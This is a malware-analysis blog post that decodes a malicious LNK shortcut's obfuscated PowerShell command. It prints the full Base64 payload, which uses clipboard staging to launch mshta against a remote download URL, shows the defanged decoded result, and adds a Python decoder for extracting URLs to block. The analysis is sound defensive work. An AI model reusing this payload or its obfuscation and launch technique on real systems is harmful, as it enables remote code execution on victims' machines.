Analysis Malicious LNK Part 2
In this article we continue with the second part of the analysis of a malicious LNK file and try to analyze its code in the simplest way possible.
Sample Link : https://bazaar.abuse.ch/sample/c07eddc933da41c6569168e02938857fc3964b36b3a95bd5df897d5a4482c961/
Malicious LNK Screenshot:
Malicious LNK Structures Analysis:
1- Target: appears to contain a long PowerShell command line that executes an encoded and obfuscated PowerShell script.
Malicious PowerShell code analysis (from the Target section of the LNK file; see the screenshot above):
1- Malicious Powershell Code : %WINDIR%\System32\WindowsPowerShell\v1.0\powershell.exe powershell -E cwBjAGIAIAAnAF4AbQBzAF4AaAB0AGEAIABeAF4AaAB0AF4AdABeAHAAcwA6AC8ALwBzAF4AXgBeAHQAXgBeAF4AbwBeAF4AcgBeAF4AXgBlAF4ANgAuAGcAbwBeAF4AXgBmAF4AXgBeAGkAbABlAF4ALgBpAG8ALwBeAF4AZABvAHcAXgBeAG4AXgBeAF4AbABvAF4AYQBkAC8AZABeAF4AXgBpAF4AcgBeAGUAYwBeAF4AdAAvAGIAMAA4AF4AXgBeAGUAXgBeAGEANwA5AF4AXgA2AC0AMgBeAF4AYwAwAGIALQBeAF4AXgA0AF4AXgBeAF4AMQBeAF4AXgAyAF4AZgBeAF4AXgBeAC0AXgBeAF4AYgBkAF4AXgBeAF4AOABeAF4AXgBeADgAXgBeAF4ALQBeAF4AXgBeADcAYgAxAF4AXgBeAGMAXgBeAF4ANgA1AGUAXgBeAF4AMwBeAF4ANgBeAF4AXgBeAGIAOQBeAF4AXgBeAGUALwBeAF4AXgBWAGUAXgBeAHIAXgBeAGwAZQBeAF4AXgBnAHUAXgBuAF4AXgBeAGcALgBtAF4AXgBeAF4AcABeAF4AXgBeADQAXgBeAF4AXgBeAF4AXgAnAC4AcgBlAHAAbABhAGMAZQAoACcAXgAnACwAJwAnACkAOwBpAGUAeAAgACgAZwBjAGIAKQA=
2- The malware author launches PowerShell with an encoded command: %WINDIR%\System32\WindowsPowerShell\v1.0\powershell.exe powershell -E
3- Encoded Base64 malicious code: the base64 string that follows the -E switch (shown in full in item 1 above).
Decoding the Base64-encoded malicious PowerShell code:
1- Open CyberChef in your web browser.
2- Paste the Base64-encoded malicious PowerShell code into the Input pane.
3- In the Operations field, select From Base64 (or double-click it).
4- Then, from the Operations field, select Remove Null Bytes.
If we look at the output after decoding, it still appears obfuscated with inserted symbols (the caret character, ^). The following steps remove this symbolic obfuscation.
Decoding the symbol-obfuscated code:
1- Do not clear the recipe used to decode the Base64-encoded PowerShell code; keep those operations in place.
2- In the Operations field, search for the Find / Replace operation and add it.
3- In the Find field, paste the caret character ( ^ ) and leave the Replace field empty.
4- You can also remove the carets manually.
Result: scb 'mshta hxxps://store6[.]gofile[.]io/download/direct/b08ea796-2c0b-412f-bd88-7b1c65e36b9e/Verlegung[.]mp4'; iex (gcb)
Here scb and gcb are the PowerShell aliases for Set-Clipboard and Get-Clipboard: the one-liner stages the mshta command line in the clipboard and then executes it with iex (Invoke-Expression), so mshta is launched with the remote URL (the file is named .mp4 to look harmless).
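To reproduce the CyberChef steps offline and pull out the URL for blocking, here is an added Python script (not part of the original post) that decodes the same -E argument: decoding the bytes as UTF-16LE replaces the Remove Null Bytes step, and the caret stripping applies the script's own .replace('^','') to the string literal it wraps instead of deleting every caret in the text. The ENCODED_COMMAND constant is the blob from the Target field above; the function names are my own.

```python
import base64
import re

# The -E argument copied from the LNK Target field analysed above, split across
# lines only for readability (the same blob the post decodes in CyberChef).
ENCODED_COMMAND = (
    "cwBjAGIAIAAnAF4AbQBzAF4AaAB0AGEAIABeAF4AaAB0AF4AdABeAHAAcwA6AC8ALwBzAF4AXgBeAHQA"
    "XgBeAF4AbwBeAF4AcgBeAF4AXgBlAF4ANgAuAGcAbwBeAF4AXgBmAF4AXgBeAGkAbABlAF4ALgBpAG8A"
    "LwBeAF4AZABvAHcAXgBeAG4AXgBeAF4AbABvAF4AYQBkAC8AZABeAF4AXgBpAF4AcgBeAGUAYwBeAF4A"
    "dAAvAGIAMAA4AF4AXgBeAGUAXgBeAGEANwA5AF4AXgA2AC0AMgBeAF4AYwAwAGIALQBeAF4AXgA0AF4A"
    "XgBeAF4AMQBeAF4AXgAyAF4AZgBeAF4AXgBeAC0AXgBeAF4AYgBkAF4AXgBeAF4AOABeAF4AXgBeADgA"
    "XgBeAF4ALQBeAF4AXgBeADcAYgAxAF4AXgBeAGMAXgBeAF4ANgA1AGUAXgBeAF4AMwBeAF4ANgBeAF4A"
    "XgBeAGIAOQBeAF4AXgBeAGUALwBeAF4AXgBWAGUAXgBeAHIAXgBeAGwAZQBeAF4AXgBnAHUAXgBuAF4A"
    "XgBeAGcALgBtAF4AXgBeAF4AcABeAF4AXgBeADQAXgBeAF4AXgBeAF4AXgAnAC4AcgBlAHAAbABhAGMA"
    "ZQAoACcAXgAnACwAJwAnACkAOwBpAGUAeAAgACgAZwBjAGIAKQA="
)


def decode_encoded_command(b64: str) -> str:
    """Reverse powershell -E: the argument is the script base64-encoded as
    UTF-16LE, which is why CyberChef shows a NUL byte after every character.
    Decoding as UTF-16LE replaces the manual 'Remove Null Bytes' step."""
    return base64.b64decode(b64).decode("utf-16-le")


def strip_caret_obfuscation(script: str) -> str:
    """Apply '<literal>'.replace('^','') to the literal it wraps, the way
    PowerShell would at run time, and drop the .replace call itself."""
    pattern = re.compile(r"'([^']*)'\.replace\('\^',''\)")
    return pattern.sub(lambda m: "'" + m.group(1).replace("^", "") + "'", script)


def extract_urls(script: str) -> list:
    """Pull every http(s) URL out of the cleaned command for blocking/hunting."""
    return re.findall(r"https?://[^\s'\"]+", script)


def defang(url: str) -> str:
    """Render a URL so it cannot be clicked by accident in a report."""
    return url.replace("http", "hxxp", 1).replace(".", "[.]")


if __name__ == "__main__":
    raw = decode_encoded_command(ENCODED_COMMAND)
    clean = strip_caret_obfuscation(raw)
    print("decoded :", raw)
    # scb/gcb are the aliases of Set-Clipboard/Get-Clipboard: the one-liner
    # stages 'mshta <url>' in the clipboard and runs it with iex.
    print("cleaned :", clean)
    for url in extract_urls(clean):
        print("url     :", defang(url))
```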


